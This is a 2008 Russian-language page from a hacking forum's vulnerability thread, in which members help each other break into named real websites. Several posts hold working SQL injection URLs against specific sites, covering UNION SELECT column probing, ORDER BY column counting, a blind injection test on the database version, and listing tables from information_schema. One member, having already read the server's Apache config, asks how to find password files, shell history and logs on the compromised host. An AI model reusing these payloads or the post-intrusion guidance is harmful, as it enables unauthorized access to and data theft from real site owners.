HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 236 из 2422 « Первая < 136186226 232 233 234 235 236 237 238 239 240 2462863367361236 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.06.2008, 05:25
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию
собственно повторюсь
Цитата:
появился вопрос...
вот есть инжект...
Код:
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.06.2008, 17:20
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Так чё,никто не знает,где путь до конфига в httpd.conf ? Выдрал этот грёбаный фаил и что дальше ? Ничего там нету.Что искать то ? Какие директивы ?
 
Ответить с цитированием

  #3  
Старый 15.06.2008, 17:49
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию
Велемир, кинь в личку содержимое - я тебе покажу
 
Ответить с цитированием

  #4  
Старый 15.06.2008, 19:32
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию
Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #5  
Старый 16.06.2008, 00:02
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
Цитата:
Сообщение от Constantine  
Велемир в закладки куда-нибудь положи https://forum.antichat.ru/thread22832.html
Ппц пасип те за статью Ж))))))))))),оч помогла)).Встали терь такие вопросы.К моему удивлению,.bash_history файла не оказалось ни у кого из юзеров (.В конфиге,лежащему по пути etc/httpd/conf/httpd.conf,нашёл одну директиву - AccessFileName .htaccess.Походу не прочитать мне буит их(.По идее,такая же директива нужна для каждого файла?).тобишь должна быть строка ещё AccessFileName .hpasswd.Хм...Есть ещё какойто конфиг,лежащий по адресу

etc/httpd/conf/vhosts/Vhosts_ispconfig.conf.Тут много интересных директив,но про них в той статье не сказано было.Есть догадки...но что это конкретно за фаил кто-нибудь может пояснить ?)

Да,и вот ещё что. В директивах ErrorLog указаны пути до лог файлов.Некоторые пути дают ошибку,хотя всё верно вводил.Некоторые пустые,но существуют 100%)).*Настоящего* лог-файла с даными ещё не встречал).Такое ощущение, что отключен лог ошибок вапще,ибо пхп.ини не прочитать =_____=
Последний раз редактировалось Велемир; 16.06.2008 в 00:09..
 
Ответить с цитированием

Помогите пожалуйста!
  #6  
Старый 16.06.2008, 00:15
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
Question Помогите пожалуйста!
Есть такой сайт http://www.modvlad.ru

Как то на него залез и решил проверить на инъ...ю
нашел ссылку http://www.modvlad.ru/photo/?g=37
проверил http://www.modvlad.ru/photo/?g=37' выдало:


Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39

попробовал обратиться к базе не выходит подскажите плиз кто знает что дальше делать??
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 00:23
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами: 10009826

Репутация: 435
По умолчанию
читать статьи про sql inj...
вообще подбирай столбцы через ордер бай
 
Ответить с цитированием

  #8  
Старый 16.06.2008, 00:37
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию
попробовал:
http://www.modvlad.ru/photo/?g=-1+order+by+100/*
и от 1 до 100

ни каких продвижений ошибка та же
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/u65735/modvlad.ru/www/gallery/engine/gallery.php on line 39
что делать дальше??
Последний раз редактировалось JoN.SmiT; 16.06.2008 в 00:42..
 
Ответить с цитированием

  #9  
Старый 16.06.2008, 00:44
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию
полей 6, а скуля слепая
Код:
http://modvlad.ru/photo/?g=33+and+if(substring((select+version()),1,1)=5,1,0)
 
Ответить с цитированием

  #10  
Старый 16.06.2008, 00:49
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию
http://www.modvlad.ru/photo/?g=37+union+select+table_name,2,3,4,5,6+from+infor mation_schema.tables+limit+38,1/*

38 Таблиц.Проще поискать скрипт с выводом =_________=.У меня тоже такое было.
 
Ответить с цитированием
Ответ
Страница 236 из 2422 « Первая < 136186226 232 233 234 235 236 237 238 239 240 2462863367361236 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.